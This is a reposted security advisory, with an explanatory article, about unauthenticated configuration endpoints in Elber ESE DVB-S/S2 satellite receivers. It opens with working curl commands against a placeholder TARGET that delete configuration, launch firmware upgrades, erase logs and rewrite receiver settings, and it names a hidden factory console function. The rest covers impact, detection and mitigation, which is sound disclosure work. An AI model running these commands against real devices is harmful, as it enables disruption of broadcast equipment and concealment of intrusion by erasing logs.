Elber ESE DVB-S/S2 Satellite Receiver 1.5.x - Device Config

Exploit Author: LiquidWorm Analysis Author: www.bubbleslearn.ir Category: WebApps Language: Shell Published Date: 2024-08-24

Elber ESE DVB-S/S2 Satellite Receiver 1.5.x Device Config


Vendor: Elber S.r.l.
Product web page: https://www.elber.it
Affected version: 1.5.179 Revision 904
                  1.5.56 Revision 884
                  1.229 Revision 440

Summary: ESE (Elber Satellite Equipment) product line, designed for the
high-end radio contribution and distribution market, where quality and
reliability are most important. The Elber IRD (Integrated Receiver Decoder)
ESE-01 offers a professional audio quality (and composite video) at an
excellent quality/price ratio. The development of digital satellite contribution
networks and the need to connect a large number of sites require a cheap
but reliable and performing satellite receiver with integrated decoder.

Desc: The device suffers from an unauthenticated device configuration and
client-side hidden functionality disclosure.

Tested on: NBFM Controller
           embOS/IP


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2024-5821
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5821.php


18.08.2023

--


# Config fan
$ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp='
Configuration applied

# Delete config
$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2'
File delete successfully

# Launch upgrade
$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1'
Upgrade launched Successfully

# Log erase
$ curl 'http://TARGET/json_data/erase_log.js?until=-2'
Logs erased

# Until:
# =0 ALL
# =-2 Yesterday
# =-8 Last week
# =-15 Last two weeks
# =-22 Last three weeks
# =-31 Last month

# Set RX config
$ curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0'
RX Config Applied Successfully

# Show factory window and FPGA upload (Console)
> cleber_show_factory_wnd()

# Etc.

Elber ESE DVB-S/S2 Satellite Receiver 1.5.x — Device Configuration Vulnerability

This article explains a security issue discovered in Elber S.r.l.’s ESE line of DVB‑S/S2 satellite receivers (various 1.5.x firmware builds). The condition allows unauthenticated modification of device configuration and exposes certain client‑side hidden functionality. The goal is to help system owners and defenders understand the risk, detect and mitigate exposure, and apply appropriate hardening and remediation steps.

Summary

Researcher Gjoko “LiquidWorm” Krstic (ZeroScience) reported that some Elber ESE devices running specific 1.5.x firmware revisions expose HTTP JSON endpoints that accept configuration commands without authentication and reveal client‑side behavior intended to be hidden. The vector allows remote actors with network access to change settings, erase logs, launch upgrades and perform other administrative actions.

Affected products and versions

Elber ESE DVB‑S/S2 satellite receivers (ESE product line)
Reported vulnerable firmware revisions include builds in the 1.5.x series (examples publicly referenced by the researcher).
Administrators should assume any unpatched device in this family running 1.5.x could be affected until validated otherwise by vendor firmware or configuration checks.

Why this matters (Impact)

Unauthenticated configuration: Attackers on the same network (or with routing to the management interface) can change device settings, potentially disrupting satellite feeds, inserting malicious content, or degrading service availability.
Hidden functionality disclosure: Client‑side scripts or UI control paths intended to be internal were exposed, providing insight into management routines and additional actions an attacker might attempt.
Operational disruption: Actions such as deleting configuration files, erasing logs, or forcing firmware upgrades can be abused to hide activity or create downtime.
Supply chain / broadcast risk: In broadcast and contribution networks, compromise of a receiver can impact service integrity and reputation.

Technical overview (non‑exploitative)

The issue revolves around HTTP endpoints returning or accepting JSON data for device management. Where a device expects a trusted management UI, the endpoints did not enforce authentication or authorization checks. In addition, the device shipped with client assets (JavaScript, UI code) that exposed certain internal operations that should not have been reachable or obvious to unauthenticated users.

Examples of affected functionality (descriptive only)

Remote alteration of fan or environmental thresholds
Issuing commands to delete configuration files or erase logs
Triggering firmware upgrade routines
Setting receiver demodulation/decoder parameters

Safe detection and validation (for administrators)

Only perform network discovery and validation against devices you own or are authorized to test. Do not attempt intrusive or modifying actions on production devices without maintenance windows and backups.

# Example (safe, non‑destructive) pattern to check if a web management interface responds.
# Replace TARGET_IP with the device IP and only run on devices you own.
# This script performs a simple GET and checks for a known management page or JSON response signature.
import requests

url = "http://TARGET_IP/"
try:
    r = requests.get(url, timeout=5)
    if r.status_code == 200:
        print("HTTP management interface reachable; examine headers and body for 'ESE' or JSON endpoints")
    else:
        print("Management HTTP responded:", r.status_code)
except Exception as e:
    print("Connection failed:", e)

Explanation: This Python snippet demonstrates a benign check to see if a device’s HTTP management interface is reachable. It purposely avoids any POST/PUT actions or parameters that would change device state. Use this only in allowed testing contexts.

Detection tips and indicators

Network services: HTTP (port 80) or other web management ports accessible from untrusted networks.
Unusual outgoing connections coinciding with upgrades or reboots recorded in network logs.
Missing authentication on management pages — pages that render control UIs without login prompts.
Unexpected configuration changes or deleted logs in unit admin interfaces.

Mitigation and remediation

Administrators should combine immediate mitigations with longer term fixes:

Apply vendor patches: Contact Elber S.r.l. and apply any firmware updates or guidance addressing the issue. Follow the vendor advisory and update procedures in a maintenance window.
Network segmentation: Place receivers’ management interfaces on isolated management VLANs, reachable only from trusted admin systems or via VPN.
Restrict access with firewall rules: Block inbound access to HTTP management ports from untrusted networks and only allow specific administrative hosts.
Use access controls and authentication: If possible, enable and enforce strong authentication for web management and disable anonymous access.
Monitor and alert: Implement logging and alerting for configuration changes, firmware upgrades, and log erasures.
Backup configuration: Maintain offline backups of device configuration and a recovery plan before applying updates.

Compensating controls (if patching is not immediately possible)

Disable the HTTP management interface if the device supports an alternative management channel (e.g., SSH with keys, management VPN).
Use a web application firewall or reverse proxy that requires authentication before proxying requests to the device.
Limit management interface exposure to a restricted set of IP addresses using ACLs on upstream routers/switches.

Responsible disclosure and vendor contact

This issue was publicly documented by ZeroScience (ZSL‑2024‑5821). System owners should review the advisory and coordinate with Elber S.r.l. for official patches or configuration guidance. When testing or disclosing, follow responsible disclosure practices: notify the vendor, allow time for patching, and coordinate any public disclosure to avoid exposing unpatched systems.

Secure development and deployment recommendations (for vendors/operators)

Enforce authentication and authorization checks on all management endpoints — never assume client‑side logic enforces security.
Perform threat modeling and code review on management APIs, especially any JSON endpoints that change state.
Minimize attack surface: disable unused services and management protocols by default.
Keep client assets (JS/CSS) from exposing internal APIs or sensitive command names; treat client code as public and design server controls accordingly.
Offer secure upgrade mechanisms (signed firmware, mutually authenticated channels) and clear rollback capability.

For incident responders

If you suspect compromise:

Isolate affected units from the network while preserving evidence.
Collect logs (where possible) before applying changes or reformatting devices.
Check for unexpected configuration changes, missing logs, and unauthorized firmware update attempts.
Restore devices from known good backups and reimage where necessary.

References and credits

Source	Details
ZeroScience Advisory	“ZSL‑2024‑5821” — Vulnerability disclosure and analysis by Gjoko “LiquidWorm” Krstic (public advisory)
Vendor	Elber S.r.l. (product information and updates) — https://www.elber.it

Final notes

Operators of broadcast and satellite contribution infrastructure should treat management interfaces as high‑value assets. Prioritize firmware updates, network isolation, and rigorous access controls. If you manage Elber ESE receivers, validate your firmware versions, confirm management access control, and coordinate with Elber and your security team for remediation.